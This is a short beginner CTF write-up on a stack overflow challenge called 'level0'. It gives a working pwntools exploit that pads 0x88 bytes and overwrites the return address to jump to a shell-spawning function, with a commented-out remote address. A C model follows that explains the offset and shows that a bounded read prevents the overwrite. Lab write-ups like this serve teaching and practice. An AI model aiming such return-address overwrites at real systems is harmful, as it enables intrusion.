Beginner exercise 05: level0

A simple stack overflow


Overwriting the return address with the address of callsystem is all that is needed.
exp:

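from pwn import *

p = process('./level0')  # run the local binary
# p = remote("111.198.29.45", "31008")  # remote target used in the original write-up
call_system = 0x400596  # address of callsystem
# 0x88 bytes of padding reach the saved return address, which is then overwritten
payload = b'a' * 0x88 + p64(call_system)
p.sendline(payload)
p.interactive()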
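Why the offset is 0x88 and what a length check changes, as an added example that is not code from the challenge binary or the original write-up. It models the stack frame as a struct and assumes a 0x80-byte buffer followed by an 8-byte saved rbp (the write-up only gives the total 0x88); `ORIG_RET`, `unchecked_read`, `bounded_read` and `ret_after` are hypothetical names.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE    0x80                  /* assumed buffer size, not stated in the write-up */
#define CALL_SYSTEM 0x400596ULL           /* callsystem address from the write-up */
#define ORIG_RET    0x1111111111111111ULL /* constructed placeholder return address */

/* Model of the stack frame: buffer, saved rbp, saved return address. */
struct frame {
    unsigned char buf[BUF_SIZE];
    unsigned char saved_rbp[8];
    unsigned char ret[8];
};
static void put_le64(unsigned char *dst, uint64_t v) {
    for (int i = 0; i < 8; i++) dst[i] = (unsigned char)(v >> (8 * i));
}
static uint64_t get_le64(const unsigned char *src) {
    uint64_t v = 0;
    for (int i = 0; i < 8; i++) v |= (uint64_t)src[i] << (8 * i);
    return v;
}

/* Copies the caller's length, as an oversized read() would (clamped to the model). */
static void unchecked_read(struct frame *f, const unsigned char *in, size_t n) {
    if (n > sizeof *f) n = sizeof *f;
    memcpy((unsigned char *)f, in, n);
}
/* Hardened form: never copies more than the buffer holds. */
static void bounded_read(struct frame *f, const unsigned char *in, size_t n) {
    if (n > sizeof f->buf) n = sizeof f->buf;
    memcpy(f->buf, in, n);
}
/* Feeds the write-up's input layout to one reader; returns the saved return address. */
uint64_t ret_after(int bounded) {
    struct frame f;
    unsigned char in[0x88 + 8];
    memset(&f, 0, sizeof f);
    put_le64(f.ret, ORIG_RET);
    memset(in, 'a', 0x88);            /* padding: buffer + saved rbp */
    put_le64(in + 0x88, CALL_SYSTEM); /* same bytes p64() produces */
    (bounded ? bounded_read : unchecked_read)(&f, in, sizeof in);
    return get_le64(f.ret);
}

int main(void) {
    printf("ret offset: 0x%zx\n", offsetof(struct frame, ret));
    printf("unchecked: 0x%llx, bounded: 0x%llx\n",
           (unsigned long long)ret_after(0), (unsigned long long)ret_after(1));
    return 0;
}
```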
